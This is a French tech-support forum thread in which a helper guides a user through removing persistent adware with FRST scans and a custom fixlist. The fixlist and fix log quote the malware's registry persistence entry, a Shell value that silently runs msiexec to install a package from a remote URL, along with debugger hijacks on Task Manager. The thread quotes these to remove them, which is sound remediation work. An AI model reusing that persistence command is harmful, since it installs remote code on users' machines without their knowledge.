virus qui m'installe des programmes !

waotony · par **waotony** » 02 mai 2017 17:55

Bonjour à tous,
ça fait 2 semaines que je me bats avec un virus qui m'installe des logiciels (Firefox, Chromium° et m'affiches des pages au démarrage de Chrome (search, etc...)
j'ai fais plusieurs scan et nettoyage avec ZHPCleaner, AdwCleaner et Malwarebytes Anti-Malware (MBAM ), mais rien n'y fait : ce satané virus revient !

Y aurait-il une âme charitable pur m'aider à l'éradiquer ??

merci !

par **Malekal_morte** » 02 mai 2017 18:19

Salut,

Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
* FRST.txt
* Shortcut.
* Additionnal.txt

Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

waotony · par **waotony** » 02 mai 2017 21:36

Bonsoir Malekal-morte,

merci pour ton aide.

Voici les 3 fichiers.
FRST.txt : http://pjjoint.malekal.com/files.php?id ... b9l7p12n11
Shortcut : http://pjjoint.malekal.com/files.php?id ... 0t7p8y11z8
Addition.txt : http://pjjoint.malekal.com/files.php?id ... n12x5w15h8

par **Malekal_morte** » 02 mai 2017 22:47

Pas tant de chose que cela au final,

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

Code : Tout sélectionner

CloseProcesses:
 HKU\S-1-5-21-1120941897-2271513944-3434366369-1001\...\Run: [SuperFitch] => C:\Users\Tonywao\AppData\Roaming\SmartOne\conhost.exe [397295 2015-09-08] () 
 HKU\S-1-5-21-1120941897-2271513944-3434366369-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.tslznzq.com/?data=zDlkMj88M8M4MWlLFkI5RjMyM8ZSFdLLOWF3FjFdNdwdRkZQFc== /q [Pays US - 104.18.58.23] 
 HKU\S-1-5-21-1120941897-2271513944-3434366369-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9532120 2017-04-11] (Piriform Ltd)  
IFEO\DisplaySwitch.exe: [Debugger] 
IFEO\taskmgr.exe: [Debugger] 
 R2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [2945312 2016-01-15] (IObit)  
 (Wondershare) C:\Program Files (x86)\Wondershare\WAF\2.3.1.1\WsAppService.exe  
 R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.3.1.1\WsAppService.exe [437392 2016-10-10] (Wondershare)  
 S3 WsDrvInst; C:\Program Files (x86)\Wondershare\Dr.Fone für iOS\DriverInstall.exe [X]  
 2017-05-02 15:39 - 2017-05-02 15:39 - 00000000 ____D C:\Program Files (x86)\MIO  
 2017-04-21 15:27 - 2017-04-21 15:27 - 00000000 _____ C:\WINDOWS\SysWOW64\33 
 2017-04-21 00:43 - 2017-04-21 00:43 - 00000000 ____D C:\Users\Tonywao\AppData\Roaming\ProductData  
 2017-04-21 00:42 - 2017-04-21 19:23 - 00000000 ____D C:\Users\Tonywao\AppData\Roaming\IObit  
 2017-04-21 00:42 - 2017-04-21 00:42 - 00000000 ____D C:\Users\Tonywao\AppData\LocalLow\IObit 
 2017-04-21 00:42 - 2017-04-21 00:42 - 00000000 ____D C:\ProgramData\ProductData 
 2017-04-21 00:41 - 2017-04-21 00:41 - 00000000 ____D C:\Users\Tonywao\Desktop\I0bitUninst5 
 2017-04-20 23:26 - 2017-04-20 23:26 - 00000000 ____D C:\Users\Tonywao\Desktop\Malwarebytes Anti-Malware 3.0.6.1469 Premium Repack 
 2017-04-14 21:51 - 2017-03-10 18:44 - 00000000 ____D C:\Users\Tonywao\AppData\Roaming\ScreenShot 
 C:\Program Files (x86)\Wondershare
EmptyTemp:
RemoveProxy:
CreateRestorePoint:
Reboot:

Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.

2°)
Réinitialise/Répare les navigateurs WEB concerné(s) par les problèmes :
* réparer Mozilla Firefox (premier paragraphe)
* réparer Google Chrome (premier paragraphe)
* Réinitialiser et réparer Internet Explorer

waotony · par **waotony** » 02 mai 2017 23:07

Encore merci pour ton aide.
Voici le rapport :

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 01-05-2017
Exécuté par Tonywao (02-05-2017 22:34:31) Run:1
Exécuté depuis C:\Users\Tonywao\Desktop
Profils chargés: Tonywao (Profils disponibles: Tonywao)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
CloseProcesses:
HKU\S-1-5-21-1120941897-2271513944-3434366369-1001\...\Run: [SuperFitch] => C:\Users\Tonywao\AppData\Roaming\SmartOne\conhost.exe [397295 2015-09-08] ()
HKU\S-1-5-21-1120941897-2271513944-3434366369-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.tslznzq.com/?data=zDlkMj88 ... wdRkZQFc== /q [Pays US - 104.18.58.23]
HKU\S-1-5-21-1120941897-2271513944-3434366369-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9532120 2017-04-11] (Piriform Ltd)
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\taskmgr.exe: [Debugger]
R2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [2945312 2016-01-15] (IObit)
(Wondershare) C:\Program Files (x86)\Wondershare\WAF\2.3.1.1\WsAppService.exe
R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.3.1.1\WsAppService.exe [437392 2016-10-10] (Wondershare)
S3 WsDrvInst; C:\Program Files (x86)\Wondershare\Dr.Fone für iOS\DriverInstall.exe [X]
2017-05-02 15:39 - 2017-05-02 15:39 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-21 15:27 - 2017-04-21 15:27 - 00000000 _____ C:\WINDOWS\SysWOW64\33
2017-04-21 00:43 - 2017-04-21 00:43 - 00000000 ____D C:\Users\Tonywao\AppData\Roaming\ProductData
2017-04-21 00:42 - 2017-04-21 19:23 - 00000000 ____D C:\Users\Tonywao\AppData\Roaming\IObit
2017-04-21 00:42 - 2017-04-21 00:42 - 00000000 ____D C:\Users\Tonywao\AppData\LocalLow\IObit
2017-04-21 00:42 - 2017-04-21 00:42 - 00000000 ____D C:\ProgramData\ProductData
2017-04-21 00:41 - 2017-04-21 00:41 - 00000000 ____D C:\Users\Tonywao\Desktop\I0bitUninst5
2017-04-20 23:26 - 2017-04-20 23:26 - 00000000 ____D C:\Users\Tonywao\Desktop\Malwarebytes Anti-Malware 3.0.6.1469 Premium Repack
2017-04-14 21:51 - 2017-03-10 18:44 - 00000000 ____D C:\Users\Tonywao\AppData\Roaming\ScreenShot
C:\Program Files (x86)\Wondershare
EmptyTemp:
RemoveProxy:
CreateRestorePoint:
Reboot:
*****************

Processus fermé avec succès.
HKU\S-1-5-21-1120941897-2271513944-3434366369-1001\Software\Microsoft\Windows\CurrentVersion\Run\\SuperFitch => valeur supprimé(es) avec succès
HKU\S-1-5-21-1120941897-2271513944-3434366369-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valeur supprimé(es) avec succès
HKU\S-1-5-21-1120941897-2271513944-3434366369-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CCleaner Monitoring => valeur supprimé(es) avec succès
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\DisplaySwitch.exe => clé supprimé(es) avec succès
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => clé supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\LiveUpdateSvc => clé supprimé(es) avec succès
LiveUpdateSvc => service supprimé(es) avec succès
C:\Program Files (x86)\Wondershare\WAF\2.3.1.1\WsAppService.exe => Aucun processus actif trouvé
HKLM\System\CurrentControlSet\Services\WsAppService => clé supprimé(es) avec succès
WsAppService => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\WsDrvInst => clé supprimé(es) avec succès
WsDrvInst => service supprimé(es) avec succès
C:\Program Files (x86)\MIO => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\33 => déplacé(es) avec succès
C:\Users\Tonywao\AppData\Roaming\ProductData => déplacé(es) avec succès
C:\Users\Tonywao\AppData\Roaming\IObit => déplacé(es) avec succès
C:\Users\Tonywao\AppData\LocalLow\IObit => déplacé(es) avec succès
C:\ProgramData\ProductData => déplacé(es) avec succès
C:\Users\Tonywao\Desktop\I0bitUninst5 => déplacé(es) avec succès
C:\Users\Tonywao\Desktop\Malwarebytes Anti-Malware 3.0.6.1469 Premium Repack => déplacé(es) avec succès
C:\Users\Tonywao\AppData\Roaming\ScreenShot => déplacé(es) avec succès
C:\Program Files (x86)\Wondershare => déplacé(es) avec succès

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1120941897-2271513944-3434366369-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1120941897-2271513944-3434366369-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès

========= Fin de RemoveProxy: =========

Le Point de restauration a été créé avec succès.

=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 157057563 B
Java, Flash, Steam htmlcache => 506 B
Windows/system/drivers => 220830670 B
Edge => 227651 B
Chrome => 93139280 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 1135 B
systemprofile32 => 128 B
LocalService => 17028904 B
NetworkService => 4262 B
Tonywao => 63704735 B

RecycleBin => 145142715 B
EmptyTemp: => 664.8 MB données temporaires supprimées.

================================

Le système a dû redémarrer.

==== Fin de Fixlog 22:35:07 ====

J'ai réinitialisé les paramètres de Chrome mais je n'ai pas fait de réinstal complète.
Qu'en penses-tu ??

par **Malekal_morte** » 02 mai 2017 23:39

Ca doit être correct.
Des problèmes en particulier ?

waotony · par **waotony** » 03 mai 2017 00:12

C'est au redémarrage ou le lendemain que le virus revient depuis 1 semaine. je te tiens au courant !
Merci une nouvelle fois pour ton aide.
j'en profite pour te poser une dernière question : quelle est pour toi la meilleure protection gratuite aujourd'hui ?
J'utilise AVIRA en général et Adblock /Ghostery sur Chrome pour l'instant : penses-tu que c'est suffisant ??

par **Malekal_morte** » 03 mai 2017 11:47

C'est suffisant.

waotony · par **waotony** » 03 mai 2017 13:47

OK !
Et toujours plus de virus aujourd'hui...Cool ! Le sujet est clos.
Encore merci

par **Malekal_morte** » 03 mai 2017 17:12

ok,

Tu peux supprimer le dossier C:\FRST =)

Termine par un nettoyage Malwarebytes Anti-Malware (MBAM ) version gratuite

Quelques conseils :

Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)

Malekal.com forum

virus qui m'installe des programmes !

virus qui m'installe des programmes !

Re: virus qui m'installe des programmes !

Re: virus qui m'installe des programmes !

Re: virus qui m'installe des programmes !

Re: virus qui m'installe des programmes !

Re: virus qui m'installe des programmes !

Re: virus qui m'installe des programmes !

Re: virus qui m'installe des programmes !

Re: virus qui m'installe des programmes !

Re: virus qui m'installe des programmes !